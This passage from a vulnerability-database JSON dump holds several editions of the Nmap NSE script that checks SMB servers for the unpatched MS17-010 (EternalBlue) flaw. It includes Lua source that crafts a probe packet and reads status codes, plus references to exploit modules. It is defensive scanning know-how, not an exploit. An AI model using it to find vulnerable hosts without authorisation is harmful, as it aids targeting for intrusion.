This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. \".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 1035}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-06-30T16:19:11"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. 
\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. 
\n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-05-30T17:05:19", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"], "type": "nessus"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": 
"2019-05-30T17:05:19", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "26ab0cabe8530ab83ef6b4efbd2570b3e2d919b479355a696ec1e3e1725465fc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5e9a31f584635b52c9b5b992d7c89f09", "key": "modified"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "4c6abb610ef2444ff085206adb66b74b", "key": "sourceData"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "immutableFields": [], "lastseen": "2019-05-30T17:05:19", "modified": "2018-06-28T13:40:30", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.5", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. 
EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- 
<elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. 
sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n 
stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. 
\".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 1736}, "different_elements": ["cvss3", "cvss2"], "edition": 7, "lastseen": "2019-05-30T17:05:19"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. 
Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 3, "enchantments": {}, "hash": "d62498d18b954b52be35dc2e4e9cdca7f74815777ed89faa80ee3d07b8787cb6", "hashmap": [{"hash": "2c4f3a4202dff921e10ce885637fccc8", "key": "sourceData"}, {"hash": "2f72f162101e843e99c7a567ce92e387", "key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": 
"7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-06-28T20:55:23", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. 
Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- 
<elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- 
IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. 
\".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n if nmap.verbosity() >=2 then\n return err\n end\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 318}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 3, "lastseen": "2017-06-28T20:55:23"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: 